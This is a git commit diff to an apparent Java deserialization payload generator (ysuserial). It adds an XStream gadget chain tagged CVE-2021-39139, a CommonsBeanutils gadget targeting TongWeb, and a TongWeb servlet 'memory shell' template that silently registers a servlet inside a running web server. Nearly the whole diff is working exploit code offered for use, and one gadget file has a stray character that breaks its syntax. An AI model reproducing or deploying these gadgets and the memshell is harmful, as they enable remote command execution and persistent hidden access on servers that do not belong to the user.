add XStream1 gadget

.gitignore

@@ -200,4 +200,10 @@ fabric.properties
 
 target/
 
-*.iml
+
+# self add
+*.iml
+*.bin
+/src/test/
+/lib/tongweb6-libs/**/*.jar
+/lib/tongweb7-libs/**/*.jar

META-INF/MANIFEST.MF

@@ -0,0 +1,3 @@
+Manifest-Version: 1.0
+Main-Class: org.su18.ysuserial.GeneratePayload
+

pom.xml

@@ -20,7 +20,7 @@
             <plugin>
                 <groupId>org.apache.maven.plugins</groupId>
                 <artifactId>maven-compiler-plugin</artifactId>
-                <version>3.11.0</version>
+                <version>3.10.1</version>
                 <configuration>
                     <!-- maximize compatibility -->
                     <source>6</source>
@@ -107,6 +107,11 @@
             <artifactId>fastjson</artifactId>
             <version>1.2.83</version>
         </dependency>
+        <dependency>
+            <groupId>com.thoughtworks.xstream</groupId>
+            <artifactId>xstream</artifactId>
+            <version>1.4.11</version>
+        </dependency>
 
         <dependency>
             <groupId>org.apache.commons</groupId>

src/main/java/org/su18/ysuserial/GeneratePayload.java

@@ -167,6 +167,11 @@ public static void main(final String[] args) {
 
 			OutputStream out;
 
+			if (payloadType.contains("XStream")) {
+				System.out.print(object);
+				System.exit(0);
+			}
+
 			if (WRITE_FILE) {
 				out = new FileOutputStream(FILE);
 			} else {

src/main/java/org/su18/ysuserial/payloads/annotation/Authors.java

@@ -42,6 +42,7 @@
 
 	String ARTSPLOIT = "artsploit";
     String Y4ER = "Y4er";
+    String DEMO = "ademo";
 
     String[] value() default {};
 

src/main/java/org/su18/ysuserial/payloads/gadgets/CommonsBeanutils1183NOCC.java

@@ -6,6 +6,7 @@
 import org.su18.ysuserial.payloads.annotation.Dependencies;
 import org.su18.ysuserial.payloads.util.Gadgets;
 import org.su18.ysuserial.payloads.util.Reflections;
+import org.su18.ysuserial.payloads.util.PayloadRunner;
 
 
 import java.util.PriorityQueue;
@@ -16,6 +17,9 @@
 @SuppressWarnings({"rawtypes", "unchecked"})
 @Dependencies({"commons-beanutils:commons-beanutils:1.8.3"})
 public class CommonsBeanutils1183NOCC implements ObjectPayload<Object> {
+	public static void main(final String[] args) throws Exception {
+		PayloadRunner.run(CommonsBeanutils1183NOCC.class, args);
+	}w
 
 	@Override
 	public Object getObject(String command) throws Exception {

src/main/java/org/su18/ysuserial/payloads/gadgets/CommonsBeanutils1183TongWeb.java

@@ -0,0 +1,48 @@
+package org.su18.ysuserial.payloads.gadgets;
+
+import javassist.CtClass;
+import org.apache.commons.beanutils.BeanComparator;
+//import com.tongweb.commons.beanutils.BeanComparator;
+import org.su18.ysuserial.payloads.ObjectPayload;
+import org.su18.ysuserial.payloads.annotation.Dependencies;
+import org.su18.ysuserial.payloads.util.Gadgets;
+import org.su18.ysuserial.payloads.util.PayloadRunner;
+import org.su18.ysuserial.payloads.util.Reflections;
+
+import java.util.PriorityQueue;
+
+import static org.su18.ysuserial.payloads.config.Config.POOL;
+import static org.su18.ysuserial.payloads.handle.ClassFieldHandler.insertField;
+
+// todo
+@SuppressWarnings({"rawtypes", "unchecked"})
+@Dependencies({"commons-beanutils:commons-beanutils:1.8.3"})
+public class CommonsBeanutils1183TongWeb implements ObjectPayload<Object> {
+	public static void main(final String[] args) throws Exception {
+		PayloadRunner.run(CommonsBeanutils1183TongWeb.class, args);
+	}
+
+	@Override
+	public Object getObject(String command) throws Exception {
+		final Object template = Gadgets.createTemplatesImpl(command);
+
+//		Class<?> BeanComparator = Class.forName("com.tongweb.commons.beanutils.BeanComparator");
+
+		CtClass ctClass = POOL.get("com.tongweb.commons.beanutils.BeanComparator");
+		insertField(ctClass, "serialVersionUID", "private static final long serialVersionUID = -3490850999041592962L;");
+
+		Class                       beanCompareClazz = ctClass.toClass();
+
+		BeanComparator              comparator       = (BeanComparator) beanCompareClazz.newInstance();
+		final PriorityQueue<Object> queue            = new PriorityQueue<Object>(2, comparator);
+		queue.add("1");
+		queue.add("1");
+
+		// switch method called by comparator
+		Reflections.setFieldValue(comparator, "property", "outputProperties");
+		Reflections.setFieldValue(comparator, "comparator", String.CASE_INSENSITIVE_ORDER);
+		Reflections.setFieldValue(queue, "queue", new Object[]{template, template});
+
+		return queue;
+	}
+}

src/main/java/org/su18/ysuserial/payloads/gadgets/Myfaces1.java

@@ -19,6 +19,7 @@
 import org.su18.ysuserial.payloads.annotation.Authors;
 import org.su18.ysuserial.payloads.annotation.Dependencies;
 import org.su18.ysuserial.payloads.util.Gadgets;
+import org.su18.ysuserial.payloads.util.PayloadRunner;
 import org.su18.ysuserial.payloads.util.Reflections;
 
 
@@ -42,6 +43,9 @@
 @Dependencies
 @Authors({Authors.MBECHLER})
 public class Myfaces1 implements ObjectPayload<Object>, DynamicDependencies {
+	public static void main(final String[] args) throws Exception {
+		PayloadRunner.run(Myfaces1.class, args);
+	}
 
 	public Object getObject(String command) throws Exception {
 		return makeExpressionPayload(command);

src/main/java/org/su18/ysuserial/payloads/gadgets/XStream1.java

@@ -0,0 +1,88 @@
+package org.su18.ysuserial.payloads.gadgets;
+
+import javassist.CtClass;
+import org.apache.commons.beanutils.BeanComparator;
+import org.su18.ysuserial.payloads.ObjectPayload;
+import org.su18.ysuserial.payloads.annotation.Authors;
+import org.su18.ysuserial.payloads.annotation.Dependencies;
+import org.su18.ysuserial.payloads.util.Gadgets;
+import org.su18.ysuserial.payloads.util.PayloadRunner;
+import org.su18.ysuserial.payloads.util.Reflections;
+import sun.misc.Unsafe;
+
+import com.thoughtworks.xstream.XStream;
+import com.thoughtworks.xstream.converters.reflection.SunUnsafeReflectionProvider;
+
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Method;
+import java.lang.reflect.Proxy;
+import java.util.HashMap;
+import java.util.LinkedHashMap;
+import java.util.LinkedHashSet;
+import java.util.PriorityQueue;
+
+import static org.su18.ysuserial.payloads.config.Config.POOL;
+import static org.su18.ysuserial.payloads.handle.ClassFieldHandler.insertField;
+
+// Xstream CVE-2021-39139
+
+@SuppressWarnings({"rawtypes", "unchecked"})
+@Dependencies({"Xstream:1.4.11"})
+@Authors({Authors.DEMO})
+public class XStream1 implements ObjectPayload<Object> {
+
+	private static Unsafe instaniateUnsafe() throws Exception {
+		Field unsafeField = Unsafe.class.getDeclaredField("theUnsafe");
+		unsafeField.setAccessible(true);
+		return (Unsafe) unsafeField.get(null);
+	}
+
+	private static void setField(String fieldName, Object defineObj, Object value) throws Exception {
+		SunUnsafeReflectionProvider reflectionProvider = new SunUnsafeReflectionProvider();
+		Field field = reflectionProvider.getFieldOrNull(defineObj.getClass(), fieldName);
+		reflectionProvider.writeField(defineObj, fieldName, value, field.getDeclaringClass());
+	}
+
+	@Override
+	public Object getObject(String command) throws Exception {
+		final Object templates = Gadgets.createTemplatesImpl(command);
+
+		Object dTraceProbe = instaniateUnsafe().allocateInstance(Class.forName("sun.tracing.dtrace.DTraceProbe"));
+		Method method_getOutputProperties =  Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl").getDeclaredMethod("getOutputProperties");
+		setField("proxy", dTraceProbe, templates);
+		setField("implementing_method", dTraceProbe, method_getOutputProperties);
+
+		HashMap map = new HashMap();
+		Method method_hashcode =  Class.forName("java.lang.Object").getDeclaredMethod("hashCode");
+		map.put(method_hashcode, dTraceProbe);
+
+		Object nullProvider = instaniateUnsafe().allocateInstance(Class.forName("sun.tracing.NullProvider"));
+		setField("active", nullProvider, true);
+		setField("providerType", nullProvider, Class.forName("java.lang.Object"));
+		setField("probes", nullProvider, map);
+
+		InvocationHandler handler = (InvocationHandler) instaniateUnsafe().allocateInstance(Class.forName("com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl"));
+		Object proxy = Proxy.newProxyInstance(
+				handler.getClass().getClassLoader(),
+				new HashMap().getClass().getInterfaces(),
+				handler);
+
+		Reflections.setFieldValue(handler, "classToInvocationHandler", new LinkedHashMap());
+		Reflections.setFieldValue(handler, "defaultHandler", nullProvider);
+
+		LinkedHashSet set = new LinkedHashSet();
+		// set.add(proxy);
+//		System.out.println();
+
+		XStream xStream = new XStream();
+//        System.out.println(xStream.toXML(set));
+//		System.out.println("<linked-hash-set>");
+//		System.out.println(xStream.toXML(proxy));
+//		System.out.println("</linked-hash-set>");
+
+		String resp = "<linked-hash-set>\n" + xStream.toXML(proxy) + "\n</linked-hash-set>";
+
+        return resp;
+    }
+}

src/main/java/org/su18/ysuserial/payloads/templates/memshell/tongweb/TongwebMS.java

@@ -0,0 +1,78 @@
+package org.su18.ysuserial.payloads.templates.memshell.tongweb;
+
+import org.apache.catalina.Wrapper;
+import org.apache.catalina.core.ApplicationServletRegistration;
+import org.apache.catalina.core.StandardContext;
+import org.apache.catalina.loader.WebappClassLoaderBase;
+
+import javax.servlet.*;
+import java.lang.reflect.Field;
+
+/**
+ * TongWeb Servlet 型内存马
+ */
+// todo
+public class TongwebMS implements Servlet {
+
+	public static String pattern;
+
+	public static String NAME;
+
+	static {
+		try {
+			// 获取 standardContext
+			WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
+
+			StandardContext standardContext;
+
+			try {
+				standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
+			} catch (Exception ignored) {
+				Field field = webappClassLoaderBase.getClass().getSuperclass().getDeclaredField("resources");
+				field.setAccessible(true);
+				Object root   = field.get(webappClassLoaderBase);
+				Field  field2 = root.getClass().getDeclaredField("context");
+				field2.setAccessible(true);
+
+				standardContext = (StandardContext) field2.get(root);
+			}
+
+
+			if (standardContext.findChild(NAME) == null) {
+				Wrapper wrapper = standardContext.createWrapper();
+				wrapper.setName(NAME);
+				standardContext.addChild(wrapper);
+				Servlet servlet = new TongwebMS();
+
+				wrapper.setServletClass(servlet.getClass().getName());
+				wrapper.setServlet(servlet);
+				ServletRegistration.Dynamic registration = new ApplicationServletRegistration(wrapper, standardContext);
+				registration.addMapping(pattern);
+			}
+		} catch (Exception ignored) {
+		}
+	}
+
+	@Override
+	public void init(ServletConfig servletConfig) throws ServletException {
+
+	}
+
+	@Override
+	public ServletConfig getServletConfig() {
+		return null;
+	}
+
+	@Override
+	public void service(ServletRequest servletRequest, ServletResponse servletResponse) {
+	}
+
+	@Override
+	public String getServletInfo() {
+		return null;
+	}
+
+	@Override
+	public void destroy() {
+	}
+}